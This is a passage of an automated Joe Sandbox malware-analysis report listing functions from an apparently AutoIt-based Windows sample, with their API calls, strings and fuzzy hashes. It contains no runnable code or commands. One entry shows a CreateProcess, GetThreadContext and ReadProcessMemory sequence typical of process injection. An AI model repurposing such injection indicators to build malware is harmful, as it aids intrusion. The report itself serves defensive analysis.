Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 0f2e8d749cd05a5f8ad02dab48992e915ed46ea35934ef1c23927b0003262e39
Instruction ID: 6604a32cadceb364ad848d8d45f3adf153b7291aea2962b1b3de6f0dd19014ae
Opcode Fuzzy Hash: 0f2e8d749cd05a5f8ad02dab48992e915ed46ea35934ef1c23927b0003262e39
Instruction Fuzzy Hash: CE21A271A042589BDF41DFD8D845BEE7BF8AF49714F00405AF409EB241DFB859898FA1

Function 00A798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00A798F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A7990F

Strings

aut, xrefs: 00A79909

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 31470e2c3c2cee7a8e1cd3d4de59e481cd2cb220da82f591f07a4258e00028ec
Instruction ID: e12c9b1b294fdc40ea198d9ede601eb01f5471ba61a5b6bc9a5ff72d67e22bc6
Opcode Fuzzy Hash: 31470e2c3c2cee7a8e1cd3d4de59e481cd2cb220da82f591f07a4258e00028ec
Instruction Fuzzy Hash: 9FD0177964030DABDB50DBA49C0AFDA772CA704700F0006A2BA54D10A1EEB095998B91

Function 00A8CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b265aca5cc83bf436897ae33316b12a381614049ba670f3bf04b26b0464eeb
Instruction ID: 592a05aa0a61434a344efe9acdde37bc6df69f70638f419d2b28b9394c30ec91
Opcode Fuzzy Hash: 17b265aca5cc83bf436897ae33316b12a381614049ba670f3bf04b26b0464eeb
Instruction Fuzzy Hash: D1F149716083019FCB14EF28C584A6ABBE5FF89324F14892EF9999B351D730E945CF92

Function 00A1F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A30193
Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A3019B
Part of subcall function 00A30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A301A6
Part of subcall function 00A30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A301B1
Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A301B9
Part of subcall function 00A30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A301C1

Part of subcall function 00A260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A1F930), ref: 00A26154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A1F9CD
OleInitialize.OLE32(00000000), ref: 00A1FA4A
CloseHandle.KERNEL32(00000000), ref: 00A545C8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ddef02b5251ee5f552d87e0a079e0de1392daa1ec9a355ed27c230c270f02d26
Instruction ID: 182561036b1f43ee8dbaead0a4f98eac0d2700ce76d561d6b0fd0b587cc0adcb
Opcode Fuzzy Hash: ddef02b5251ee5f552d87e0a079e0de1392daa1ec9a355ed27c230c270f02d26
Instruction Fuzzy Hash: E5819EF0D02A408FC384DFB9EA54A597BE6FB59306760852BD01BCB361E7744486CF12

Function 00A1434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A14370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A14415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A14432

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: bae60ab23250ce54f76b4c0b8702d7afa0b18390a2e7f857490423a72ad95f12
Instruction ID: a5ac438a369ad5a27669672df7bd8d6185af14ded3de2b694bcbb2c6ace0f238
Opcode Fuzzy Hash: bae60ab23250ce54f76b4c0b8702d7afa0b18390a2e7f857490423a72ad95f12
Instruction Fuzzy Hash: C0318EB09057018FD721DF78D8846DBBBF8FB49309F00092EE59A86251E770A989CB52

Function 00A3571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00A35733

Part of subcall function 00A3A16B: __NMSG_WRITE.LIBCMT ref: 00A3A192
Part of subcall function 00A3A16B: __NMSG_WRITE.LIBCMT ref: 00A3A19C

__NMSG_WRITE.LIBCMT ref: 00A3573A

Part of subcall function 00A3A1C8: GetModuleFileNameW.KERNEL32(00000000,00AD33BA,00000104,?,00000001,00000000), ref: 00A3A25A
Part of subcall function 00A3A1C8: ___crtMessageBoxW.LIBCMT ref: 00A3A308

Part of subcall function 00A3309F: ___crtCorExitProcess.LIBCMT ref: 00A330A5
Part of subcall function 00A3309F: ExitProcess.KERNEL32 ref: 00A330AE

Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28

RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: e5bcc8ee0d866cb5643cc6ab4d54c6af66046972f8da7ea948df1a0d9139a1a6
Instruction ID: 35c09d3e08102db1a821a47d3fbb2aedf3b11ed0ea278bc65ca70454f02efe06
Opcode Fuzzy Hash: e5bcc8ee0d866cb5643cc6ab4d54c6af66046972f8da7ea948df1a0d9139a1a6
Instruction Fuzzy Hash: 61012432B00B12DEDA146B7CFD82A6E73988F92761F100D36F90ADB1D1DEB08C014661

Function 00A798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A79548,?,?,?,?,?,00000004), ref: 00A798BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A798D1
CloseHandle.KERNEL32(00000000,?,00A79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A798D8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 81716a7b8c3152720c3d9e82259be507dd2e25b21781b968e4d1fe2358334a88
Instruction ID: d696e30e96ea3d69ad05b04d889dfd5ad68366c7a992c5f98cad61582f93f0a7
Opcode Fuzzy Hash: 81716a7b8c3152720c3d9e82259be507dd2e25b21781b968e4d1fe2358334a88
Instruction Fuzzy Hash: 1DE08632241224BBD7215BA4EC09FCA7B59EB06760F208222FB28A90E08BB1151297D8

Function 00A1A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00A4FC01

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 38c20c5935602a0a1c27c4446cfe2faea3a55289d59f7f8710726ef99f138986
Instruction ID: 855e18780c737f8d45dee38703b3c25c9419c278330b6b52eac02a292c4adf94
Opcode Fuzzy Hash: 38c20c5935602a0a1c27c4446cfe2faea3a55289d59f7f8710726ef99f138986
Instruction Fuzzy Hash: BF224774609311DFCB24DF14C590AAABBF1BF95314F14896DE89A8B362D731EC85CB82

Function 00A14C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A14CBA

Strings

EA06, xrefs: 00A4D8CC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 28eeaddca20daa6987ae59fb072bca81e51e26c659f6367cce0afdd633669c8e
Instruction ID: 555ffbc029c7b32d6cb7cd048bad4d20243ecf542ad44a1db4a894c324196603
Opcode Fuzzy Hash: 28eeaddca20daa6987ae59fb072bca81e51e26c659f6367cce0afdd633669c8e
Instruction Fuzzy Hash: 99413D71A041585BDF219B6CE961BFE7FB69B4D300F684475EC82AB286D6209DC483A2

Function 00A17A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A17AAB
_memmove.LIBCMT ref: 00A17B16

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
Instruction ID: b6b517939511265abaef5a27b3ec4240fe5dc6bae7a463a87e6de9069622a9d2
Opcode Fuzzy Hash: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
Instruction Fuzzy Hash: 053182B1604606AFC704DF68C9D1EADB3B9FF48360B158629E519CB291EB30ED60CB90

Function 00A147D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A14834

Part of subcall function 00A3336C: __lock.LIBCMT ref: 00A33372
Part of subcall function 00A3336C: DecodePointer.KERNEL32(00000001,?,00A14849,00A67C74), ref: 00A3337E
Part of subcall function 00A3336C: EncodePointer.KERNEL32(?,?,00A14849,00A67C74), ref: 00A33389

Part of subcall function 00A148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A14915
Part of subcall function 00A148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A1492A

Part of subcall function 00A13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A13B68
Part of subcall function 00A13B3A: IsDebuggerPresent.KERNEL32 ref: 00A13B7A
Part of subcall function 00A13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AD52F8,00AD52E0,?,?), ref: 00A13BEB
Part of subcall function 00A13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00A13C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A14874

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: cc819cb63cf5e6d49dc247e775cdfaac25009f2355e940375cad0a179bf4cf7a
Instruction ID: b641bb0d73353354205e34216a58042a4635c26e288f2a1924bd89aab1622eb4
Opcode Fuzzy Hash: cc819cb63cf5e6d49dc247e775cdfaac25009f2355e940375cad0a179bf4cf7a
Instruction Fuzzy Hash: 5C118CB29093019FCB00DFB9D94598ABBE8FB89750F10491BF041872B1DB70958ACB92

Function 00A2092D Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13C14,00AD52F8,?,?,?), ref: 00A2096E

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

_wcscat.LIBCMT ref: 00A54CB7

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 9077725ba89790a678081cb2ae633b04e10c6ceaf6e3fe852fe8618a8ae6d6f6
Instruction ID: c6e5e9f3b52186bb586376b1341e6e2f2413da67f2ae64d9ee47c42518292e48
Opcode Fuzzy Hash: 9077725ba89790a678081cb2ae633b04e10c6ceaf6e3fe852fe8618a8ae6d6f6
Instruction Fuzzy Hash: 1511A531A09218AB8B00EBB8DE06EDD73F8AF08390B0044B6F946D7286EA7096C44B10

Function 00A30DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A3571C: __FF_MSGBANNER.LIBCMT ref: 00A35733
Part of subcall function 00A3571C: __NMSG_WRITE.LIBCMT ref: 00A3573A
Part of subcall function 00A3571C: RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F

std::exception::exception.LIBCMT ref: 00A30DEC
__CxxThrowException@8.LIBCMT ref: 00A30E01

Part of subcall function 00A3859B: RaiseException.KERNEL32(?,?,?,00AC9E78,00000000,?,?,?,?,00A30E06,?,00AC9E78,?,00000001), ref: 00A385F0

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 7b9c3f4c430f2fba97dc743080dd09f1d630210d822f47a526844408a91f9719
Instruction ID: 2a0c7fe95ee4bc776c3c102b5f318faf2ec6d7428e448a60f68f3879dda00001
Opcode Fuzzy Hash: 7b9c3f4c430f2fba97dc743080dd09f1d630210d822f47a526844408a91f9719
Instruction Fuzzy Hash: 5DF0A43194031966DB10BBA8ED15EDF77AC9F01351F104469F904A6982EF719A5082D1

Function 00A353A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28

__lock_file.LIBCMT ref: 00A353EB

Part of subcall function 00A36C11: __lock.LIBCMT ref: 00A36C34

__fclose_nolock.LIBCMT ref: 00A353F6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 4a4b9c5b1ac570cb8b89d3b6ea69eaba6481f79d95aaeb8031e9244b7980a475
Instruction ID: a6add73ec7a69637aa33da2c44de849ace6108abe6d345baba9ec28e735e0520
Opcode Fuzzy Hash: 4a4b9c5b1ac570cb8b89d3b6ea69eaba6481f79d95aaeb8031e9244b7980a475
Instruction Fuzzy Hash: 74F09071C01B049ADB11BF7999067AD6AE06F41374F218208B424AF1C1CFBC89419F92

Function 0114A1CD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0114A98B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0114AA21
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0114AA43

Memory Dump Source

Source File: 00000000.00000002.1333407734.0000000001148000.00000040.00000020.00020000.00000000.sdmp, Offset: 01148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1148000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 71757807d76d880c46230b3b6f9a13c6d4e9ff48d7e7675d33572ee2d3ec06c7
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: C912CE24E24658C7EB24DF64D8507DEB232EF68700F1090E9910DEB7A5E77A4E81CF5A

Function 00A30C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00A30CB7

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f699bf38e15a646f90e4f521893d0986cc2414bf90eaf67999c3774755c3e38c
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3531D170A001059BC718DF59C4A4A69F7B6FB59300F64A7A5E84ACB352DB31EDC1DBC0

Function 00A4FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A4FCB7

Memory Dump Source

